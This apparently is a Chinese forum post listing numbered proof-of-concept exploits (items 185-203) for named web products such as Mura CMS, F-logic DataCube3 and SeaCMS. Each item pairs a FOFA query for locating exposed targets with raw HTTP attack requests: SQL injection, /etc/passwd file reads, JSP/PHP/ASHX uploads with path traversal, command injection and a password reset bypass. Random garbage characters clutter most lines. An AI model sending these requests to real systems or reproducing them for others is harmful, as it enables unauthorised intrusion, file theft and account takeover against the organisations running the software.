% ]4 { ]7 Y, CContent-Type: text/xml; charset=utf-83 N- X! A2 y0 ]5 N0 o; d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 E( j* x; c* G/ u0 W
X-Requested-With: XMLHttpRequest9 `; l$ ?3 {8 b5 b Q: o
& a5 o* x* x9 Q! _
$ _: k! e/ T1 M1 Uinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
+ V4 n' t6 w' v/ M0 {: ~* z, q4 M
" J7 n' _( \8 ~: t9 U185. 瑞友天翼应用虚拟化系统SQL注入 c. f/ k. Y( ~; O$ O9 p/ F
version < 7.0.5.1
& t$ F; P6 U GFOFA:app="REALOR-天翼应用虚拟化系统"5 @4 C9 y1 C! h: c3 n2 v
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1% G! f! W N- R2 k* H) G( {3 O
Host: host2 n! @' _6 ~0 O/ ~9 Q6 z8 N! {+ T
4 P% t l1 x% a: I* {7 I3 Q: s0 t5 @* m& L7 ~8 c, T
186. F-logic DataCube3 SQL注入
: [/ i A9 y* s3 X/ z7 SCVE-2024-317505 A% ?* s: B- t1 r! u; R* K
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统" K' H/ W1 v$ P# V8 \
FOFA:title=="DataCube3"" q* c# l6 m6 l2 L! [9 g
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
7 y' n: N" `- B3 P3 L9 j- y( lHost: your-ip
8 H0 t! e+ T. y/ L8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0( S% _2 u! \5 F @9 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.80 Y* h' J' v3 A3 j+ J3 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: F/ ?! O; H; a/ i
Accept-Encoding: gzip, deflate
- G$ p$ ]$ `" |& w' @- t. lConnection: close
1 }4 {: y7 d/ l, f% B+ r1 n2 pContent-Type: application/x-www-form-urlencoded# O2 r! I/ I) r- j4 ~8 ~, g$ t
$ f- a! I) Q9 p# k4 A
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
( @: b+ w* |2 J# H$ m/ R5 h7 G, M2 u6 W# D' \3 y! a1 h
- r* _( f( d8 \: C/ q6 p
187. Mura CMS processAsyncObject SQL注入$ S9 E; C( w8 [2 Q, I
CVE-2024-32640
" J2 O3 m! Q$ m$ {- O- MFOFA:"Mura CMS"& R! k- O1 S2 x6 [# }: Y
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
( I" k6 F, Y8 [" J/ \Host: your-ip! z9 p. q/ a5 N2 W& j. i9 J
Content-Type: application/x-www-form-urlencoded& ]8 _% K" ]4 h- W. u- d
( T; `8 [) D- ^
* j" c N( ? V! Q0 H
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1, ]& m6 R! J# u+ k& c2 i
* @- f. X7 r( I E* d* N
1 Y& W, s) ?( ^
188. 叁体-佳会视频会议 attachment 任意文件读取* x N p* [: }/ n1 ]0 Y- e
version <= 3.9.70 S4 C5 D( @/ k2 h' I4 w# _
FOFA:body="/system/get_rtc_user_defined_info?site_id"
- f Z9 ?; u( e- l8 M" ZGET /attachment?file=/etc/passwd HTTP/1.1
5 ]1 c" V4 x6 Z& C: B- WHost: your-ip
N2 l3 d1 B; |# z: [% _* p" ]3 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 |' C8 ?; i0 o }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 B% L, ]. n0 ^3 B8 `8 B
Accept-Encoding: gzip, deflate
- x' B. O' k. _9 l. VAccept-Language: zh-CN,zh;q=0.9,en;q=0.8, P6 X# j9 r4 @9 h4 S
Connection: close* y8 d7 _: D0 p Z) i
. H( ]. O% Z8 r, K, w0 h5 S
8 v; ^+ Y% I. j189. 蓝网科技临床浏览系统 deleteStudy SQL注入8 m$ N H) q( S# g$ T* x) s
FOFA:app="LANWON-临床浏览系统"- b8 y/ F2 L! D7 k
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.13 f( {& |+ h" c' n9 t7 b B' [: t
Host: your-ip
`% t3 T& ]# p2 {8 S( M, aUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 _; G7 e) k# }9 I6 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 q0 c: K7 M7 R/ X/ z( o
Accept-Encoding: gzip, deflate0 Z- e! e0 t9 i6 \6 W0 @
Accept-Language: zh-CN,zh;q=0.9$ Z; s7 G2 g5 Q# D1 [. Q# g0 S* K3 v
Connection: close
4 r% s. D1 |# Z1 {& q) F" W! Q7 _5 e d/ l7 d
. E0 Q! U% i; ]5 d0 i/ Q
190. 短视频矩阵营销系统 poihuoqu 任意文件读取% k9 E+ a( M: n1 w+ D
FOFA:title=="短视频矩阵营销系统"
! I) X: G9 X. h+ ^POST /index.php/admin/Userinfo/poihuoqu HTTP/2
6 V# F9 d; [" Q2 EHost: your-ip
' G v% V+ @3 c3 `! k4 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
% R' l0 r1 \$ H, b& tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ t. v/ S. z# C8 w+ i* c9 [7 C
Content-Type: application/x-www-form-urlencoded
( m& @- O6 M0 g' j) gAccept-Encoding: gzip, deflate
# h0 {1 W. V5 \7 W3 s, W+ O$ HAccept-Language: zh-CN,zh;q=0.9& U1 _& X, [- Z8 O& k
E5 g& y& Z$ M0 \$ npoi=file:///etc/passwd
$ I/ v- y% U8 U0 X* \& t2 g" _4 c' E8 i1 t: N. Q" q
5 S0 x( ^5 g% s# N191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
+ f* Q$ o5 n' P! E0 G HFOFA:body="/CDGServer3/index.jsp"
) s1 j! I# O( [" IPOST /CDGServer3/js/../NavigationAjax HTTP/1.1% ^/ m" M5 n( u% @
Host: your-ip8 M& d" K a4 u# | G* Q5 K0 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ G; l# ^1 Y$ Y" p B; D* eContent-Type: application/x-www-form-urlencoded: ?* e4 r: F- X. w j
5 `) J9 V8 l9 @9 c5 zcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
9 O3 u1 [7 r% q( H& _' m7 f
\" |! W8 z0 B. z7 v1 j# e7 B# S+ w
2 O8 O, C* ], ~/ [' P" {/ k) |192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
& O. C! d( S& z. r8 H# f3 e( x: nFOFA:title="用户登录_富通天下外贸ERP"1 f* v! c4 N3 k1 x) f, M
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1% n0 t9 h9 ]% n' H$ u }4 @
Host: your-ip
3 m: W4 G0 K1 Y& h7 {* D/ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36( ?6 X$ Z1 P6 ~. C, [3 F
Content-Type: application/x-www-form-urlencoded4 n; w& f' A3 g6 p$ J( M2 `
- V+ Z; A3 Z5 B3 [/ D( X
% r$ D8 z0 ~ c6 ~/ Z% t+ f
<% @ webhandler language="C#" class="AverageHandler" %>; O9 S( a6 ^" y% [) A0 K8 J0 F4 S# c. A
using System; z" ]$ T' u. T5 R+ |$ h- {
using System.Web;- _8 f2 z( Y* j0 _" l1 U( Q( K; n
public class AverageHandler : IHttpHandler
( t- p0 L, `3 r7 N{
2 Z) z# V6 ^1 c9 @- Opublic bool IsReusable
9 c& | ^1 U: c9 W3 v{ get { return true; } }
- ?' y, T: O# q6 I2 v2 w3 Zpublic void ProcessRequest(HttpContext ctx)
6 o* k; f; v8 J+ P( s, |- T4 }{7 t; f Q) x. L. ?3 Q7 f: S! I
ctx.Response.Write("test");, D' N b' ]% L/ l/ T. r
}
1 a# |+ i' a' z6 O0 D/ s}
9 D6 i! g8 h6 l1 z; y" Z6 c6 P7 `
+ {1 g' E7 k* i" q; W3 {3 H- v( t
" Z6 b9 r: E* u% B: l193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行/ i$ }" {! {( H. c
FOFA:body="山石云鉴主机安全管理系统"
$ d9 B+ Y5 R& l& p6 \/ a" hGET /master/ajaxActions/getTokenAction.php HTTP/1.1
/ L/ z. ?( Y |Host:
% G+ q& v, S% m8 ~. T$ e0 CCookie: PHPSESSID=2333333333333;
6 S* b7 q. M. V |Content-Type: application/x-www-form-urlencoded) U7 u( v1 ^: n3 _; x+ w- W
User-Agent: Mozilla/5.0. R# `: u/ }7 P/ b
7 C: e2 K' ?: ^% f/ ?+ u
/ D# t* l/ F7 O1 ^& rPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1; L7 P! B2 m3 O* |
Host:
& m/ c! @( |$ l1 O7 r9 oUser-Agent: Mozilla/5.0/ C- k5 B, k- r8 J7 ^' f# g& t
Accept-Encoding: gzip, deflate6 {9 l K$ c; ^; W3 _4 _2 ]) Y6 w
Accept: */*
3 S: D# Z/ d! ?' JConnection: close
% G2 n: j D3 p2 [; hCookie: PHPSESSID=2333333333333;$ M3 {! `6 k0 |2 H
Content-Type: application/x-www-form-urlencoded
& v/ u' J! J( i6 H% D4 |- ZContent-Length: 84
( L0 L. a, Q% b2 Z- Z$ U- m9 S1 v0 x# M- W/ P4 Q. ?8 g
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
8 R& G9 y* x5 J
, \$ H# n- m) `7 L
6 l9 W( q) Y; Q9 D q9 Z) o7 {GET /master/img/config HTTP/1.1
6 n7 R7 Z% c* s! sHost:
, n3 s) ], O2 \0 Q, VUser-Agent: Mozilla/5.0' i2 u5 f( _' L8 C" T( Z% L# ?7 c+ Y
. U" F! \! `3 Y; J' z4 G9 a
- K4 D& V$ _6 s194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
( p1 K, Z8 e# l+ F. f$ YFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在, C7 M. K1 t2 q
5 P2 L5 C4 \" H( R7 ]' w9 _& nPOST /servlet/uploadAttachmentServlet HTTP/1.14 \5 c0 Y/ u _0 v/ o: C `
Host: host
7 Z0 i/ _$ ?( s% ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
& }& p1 f# h9 T5 z' h0 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 @4 B6 m$ |5 d3 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ |0 V+ H* Y/ {; s
Accept-Encoding: gzip, deflate
; B6 p! ~8 N7 a+ WConnection: close7 l: ?) p6 V0 J( y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
6 ~/ V1 R4 C- n' t2 ^------WebKitFormBoundaryKNt0t4vBe8cX9rZk Q, r4 u; K5 _4 \5 F$ J* q
' ^$ Z) z) r, t
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
' n8 E) u* M; ~1 [% n; z- N! xContent-Type: text/plain
& i2 P8 n( E) g( w<% out.println("hello");%># u% s* O# e, `
------WebKitFormBoundaryKNt0t4vBe8cX9rZk- \, `: P+ v, t
Content-Disposition: form-data; name="json"7 F3 \/ i' |) K5 \, ^$ {& a: B
{"iq":{"query":{"UpdateType":"mail"}}}) U5 U- G1 Y- t. J
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--- M* [+ d" L& f/ y0 Z
+ \: t O' s% N( h, y5 N2 S. @- @' s) u |( s+ h" Q
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行+ ~+ {# t) V8 X; ?
FOFA:title=="飞鱼星企业级智能上网行为管理系统9 @2 c7 J k0 [$ t ?
POST /send_order.cgi?parameter=operation HTTP/1.1* p6 m% ]8 {# t4 t2 ~
Host: 127.0.0.1
0 V5 C7 |& V8 r, H9 L# XPragma: no-cache8 d7 m% M8 {0 x% J' W# h$ t0 j
Cache-Control: no-cache- K' k7 [1 W. h, o3 X, ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 W" n# P/ l6 D ]+ qAccept: */*
- r" E p) n# E1 _Accept-Encoding: gzip, deflate
; l2 J4 ^2 f( v8 I5 g4 |Accept-Language: zh-CN,zh;q=0.9
5 q+ x. [. C z5 R8 S( X& pConnection: close! P' Z# S+ n) w1 Q5 j: I3 H
Content-Type: application/x-www-form-urlencoded
3 J, N, M- [! rContent-Length: 684 G, E$ w+ D n+ t- Q
9 A) d4 E+ t/ ?* N3 V{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
+ \5 z' S6 w, d* p3 ]2 L
* S N+ k z8 A$ [6 F( j
- z% X% q$ Y4 j3 e196. 河南省风速科技统一认证平台密码重置
a, s9 ]* T; K: |( M6 O; U& qFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
- c8 {- c: Q1 p, `' Z" KPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1" l# H0 I' y, e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
* S" d- U2 a# wContent-Type: application/json;charset=UTF-8! q. H) o5 y/ Y" X; R3 N1 L7 l
X-Requested-With: XMLHttpRequest
9 w8 C# H; F, o2 o2 cHost:
1 T( m2 s0 s: MAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2" ^. d" W' t& M
Content-Length: 459 k9 W* T* v, w( v% l8 a
Connection: close5 q# p* H: O x4 t
, _- Y E, u" J9 |8 x8 T{"xgh":"test","newPass":"test666","email":""}
0 _4 X* T) I( ]$ S3 j" C5 `2 j+ T- `" K& Q( P
& y+ q- Q3 W4 n5 v! M
4 y8 m0 Q8 l; c* U; a8 ^197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入$ m: r1 _- c( n! n. z
FOFA:app="浙大恩特客户资源管理系统"4 v" @7 Y- n0 o7 }) h
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
8 {% S, o5 n: s* `3 T' B2 FHost:, b8 e5 ^3 r; W0 S0 C+ v' o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
; h6 g2 t' \7 ?& cAccept-Encoding: gzip, deflate
+ c" [; K$ ], s! s9 i' yConnection: close
% t |( _( q; e5 r* r- M% K
: \1 x9 J( f4 q- Y3 b9 u$ h+ w) v9 w
3 Z/ D7 t! i2 A8 F! f0 R
198. 阿里云盘 WebDAV 命令注入9 h8 ]4 B9 B9 k4 W: O# D; [
CVE-2024-29640/ Y4 q4 R7 O6 C2 q) c$ O) {5 M, ~
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1: d. O4 @7 ]4 x: i4 t$ L% ?( B' j7 P
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf649 Z3 j' g% T0 U7 ?3 p0 G
Accept: */*, L% L2 }5 j3 d5 |4 k
Accept-Encoding: gzip, deflate
* z: |$ C0 L7 n7 u9 i* r5 TAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6& N4 K" r- S8 d" U: \
Connection: close: J/ K+ h/ t y7 S0 [5 w
# f8 d" j% Y) S2 f& W% E$ \( [) X' [ e
199. cockpit系统assetsmanager_upload接口 文件上传- ]. A) N, C4 N& y* k( h
7 h) [4 ?- I( N1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
! o) I2 B/ ]* e: D; h8 P& ?GET /auth/login?to=/ HTTP/1.1
w/ j* y! T9 @$ _2 I2 u7 j3 i$ ]" i3 D4 Y
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
8 l3 z0 E- }* w7 [$ z* g+ S, {2 s( \( r9 j% z! {& m
2.使用刚才上一步获取到的jwt获取cookie:0 R( H2 E4 P' ?! A5 E
) V# k J9 V& r, J; t
POST /auth/check HTTP/1.1' g4 O) j( I. }9 J4 n/ y
Content-Type: application/json
. E7 P3 O1 x3 H4 E- J
0 a, H% F0 Q: Z. Z{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
# L8 r/ M+ t( \+ \
6 c; E8 P, |3 g3 n W( S6 U9 O响应:200,返回值:! S$ {* P9 x! g* y0 ]0 j" t
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
: A5 b/ L& j3 eFofa:title="Authenticate Please!"
* n; Z: T( v5 w6 zPOST /assetsmanager/upload HTTP/1.1. q) N9 K1 F3 a4 ?+ c
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3' T2 [' h3 j, J( o& p& Q& g
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
* u( g+ R' v/ i8 d/ Y" C' p0 ~. k% ]: n+ Q- ~+ e
-----------------------------36D28FBc36bd6feE7Fb3
& n6 O. l' u# XContent-Disposition: form-data; name="files[]"; filename="tttt.php"8 F( s7 w j% N( `4 B/ z, [
Content-Type: text/php
/ C- b( A1 e+ q% [, {& i* j) `. n- |. Y! B
<?php echo "tttt";unlink(__FILE__);?>* H9 f$ S! S K, [* d
-----------------------------36D28FBc36bd6feE7Fb3
( P' X: H4 w5 b7 P3 QContent-Disposition: form-data; name="folder"* i7 f& X% V$ ~# f
' f) Q9 P# O/ {* m) M, A-----------------------------36D28FBc36bd6feE7Fb3--
: \9 I! T Z. s6 i; l8 o. v, L
~+ W. \" x+ V' S' U" m2 r. o' ]7 D* }) F* x" t/ A5 Y( d0 O! L
/storage/uploads/tttt.php
, N7 C, `4 z0 I8 m! X
! ]1 U: H" G* J" W: R" ^* ?. I- o% c' O200. SeaCMS海洋影视管理系统dmku SQL注入
8 b$ H1 U, A! T% v" T. Q7 t$ LFOFA:app="海洋CMS"9 } R% H5 H; [! e; x! N( g# ]6 I
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1' D( r+ q/ @0 |% C+ u' ^6 V
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
, T3 _3 L; u8 m5 DUpgrade-Insecure-Requests: 1
# V! i( y* o6 Z4 X: w! RCache-Control: max-age=0
, a0 @- R/ J/ F( G# m" b- vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 h# x, t4 A; S& l! C; FAccept-Encoding: gzip, deflate! h; f& f+ {! |1 s+ A
Accept-Language: zh-CN,zh;q=0.9
9 X% N9 e8 P7 C% g& S8 T3 S$ r) ^
5 P1 \4 y( J& S3 `" o201. 方正全媒体新闻采编系统 binary SQL注入6 d$ A" F8 T! N4 Q& m# B: z
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
3 [) Q' c+ t# j& ^+ ^6 o- Y. ?: U7 @POST /newsedit/newsplan/task/binary.do HTTP/1.10 Z6 v5 w7 k/ X+ a6 e- ?
Content-Type: application/x-www-form-urlencoded
7 N' Q* ?8 _+ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 d3 ^1 s' o. X2 T& S% u* UAccept-Encoding: gzip, deflate' a _+ c5 }) G# V& g9 j! B
Accept-Language: zh-CN,zh;q=0.9+ r* N2 w7 G3 w T& R4 A
Connection: close* t7 n1 _) V4 r% R, A
5 q$ \! U+ |. b Y' S8 }
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
0 p5 a8 ` ?9 m/ b
( B [* W8 [, N9 K- |7 _" L. N( |5 F
202. 微擎系统 AccountEdit任意文件上传
; V8 I6 I% ?/ d( [. KFOFA:body="/Widgets/WidgetCollection/"/ u" o) k6 U& k# `8 Q: ^
获取__VIEWSTATE和__EVENTVALIDATION值
! Q! Y) [& K# v c6 u1 g* }2 DGET /User/AccountEdit.aspx HTTP/1.1
+ d& R% u. Q% a; SHost: 滑板人之家
+ Z( D& e, T6 L$ R5 I, |* h! ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31. j5 `; o) |5 Z9 X6 v# ~
Content-Length: 0
9 r9 K& O: S0 X) ?7 F* O8 i6 S! V. ~ I+ s) o/ K% q9 {
7 y/ Y- V j% H+ ~" t0 ?; U7 s! f2 [替换__VIEWSTATE和__EVENTVALIDATION值
4 ^2 {# z% @ M5 b% L: {POST /User/AccountEdit.aspx HTTP/1.12 l5 l" |3 o l; k
Accept-Encoding: gzip, deflate, br
$ O: I+ Y4 v) T3 C RContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
# o$ U# u( c1 R; R
5 W$ @. a p+ {-----------------------------786435874t38587593865736587346567358735687
& M& T7 h! ?9 j* J; uContent-Disposition: form-data; name="__VIEWSTATE"
: n& ~& I* n S$ A, \/ l6 a
- ^6 D2 f4 Y- `0 H1 y. R* E' ^__VIEWSTATE. C" [ c- R$ z: x$ ?
-----------------------------786435874t38587593865736587346567358735687
' c& q% J" J1 `' s/ S! p# b* }Content-Disposition: form-data; name="__EVENTVALIDATION") B) M% b/ H& j3 L2 O0 N8 H
% {) V3 \0 e9 t' o+ \__EVENTVALIDATION) T: A5 B; O; l, v4 M
-----------------------------786435874t385875938657365873465673587356878 W/ A4 c2 o* \' C' T- u& r
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
& {8 k5 k- w' nContent-Type: text/plain
. k2 N9 c7 g/ r; Q" c, G# H$ d8 E# B) b' u
Hello World!
4 H, M: t2 m+ S0 e; R-----------------------------786435874t38587593865736587346567358735687* Q7 o( s" E' u+ X5 N$ c8 p
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload", y$ f' v# L8 m
" y0 s* A/ z. F" A8 ~* G; ?
上传图片! R' B9 P% k) h0 u7 w) m1 z
-----------------------------786435874t38587593865736587346567358735687
5 b4 O' k1 @8 L+ j& p7 gContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
4 ~9 |5 Z, ]2 H$ u- H5 T4 V9 Z. f
# d5 M; W$ J$ F- f* N
% B& c1 e# e7 q# }1 ^" R9 E7 P k-----------------------------786435874t38587593865736587346567358735687
) ]+ {5 I, ^5 Z3 G/ d; R: D1 TContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"+ V" G1 [* _9 l* }
- t4 u% \$ v1 f1 J# z
2 u# o& }& `& ?( z6 E-----------------------------786435874t38587593865736587346567358735687--
4 M1 @; w& Z3 l7 v
. S: k0 s' F; C8 Y" Q3 m
2 y' S: G- E8 Y" ]* v/_data/Uploads/1123.txt1 b3 t! s, C6 E
/ a L$ U& h3 ?5 ?& |
203. 红海云EHR PtFjk 文件上传0 q. g: Q, M! _# l* }3 Q- L
FOFA:body="RedseaPlatform"
/ p, @* C5 H3 `, fPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
) e5 b3 ]' R8 @, zHost: x.x.x.x2 Q: o6 {, ~0 {" ~; [, h$ {: k2 W
Accept-Encoding: gzip- t3 _2 o2 A+ }: s; }' j' N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 z; _- l5 x* s! J4 z# J1 m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
' X( }+ w# J6 P4 Q: J6 p: U" r8 zContent-Length: 210
* t! b! p1 I& Y# u8 y: d1 H2 e6 n5 `+ t' N c0 f p, e
------WebKitFormBoundaryt7WbDl1tXogoZys4+ x) |8 l& i6 n$ ~ w) O& z. K
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"1 c. R/ t, Q1 }% b% _
Content-Type:image/jpeg6 t7 t. s. [- O5 E9 r) ~
' V1 k3 |- A/ ]6 H4 F( K8 y<% out.print("hello,eHR");%>4 L# X6 @& J8 H' E1 y7 A
------WebKitFormBoundaryt7WbDl1tXogoZys4--; F# N; E/ m K- H: F
: ^) U( Y- [- c ) d( g X5 d" h: E
; }; E7 H- L+ L" _8 {9 F5 [7 M! y! ^
+ F _* Z. ~0 k* d) g+ Z& t2 a- `& v; |. l$ w' G$ P
0 l1 E6 w! |9 c! k
|
发表于 2024-6-5 14:31:29
收藏
支持
反对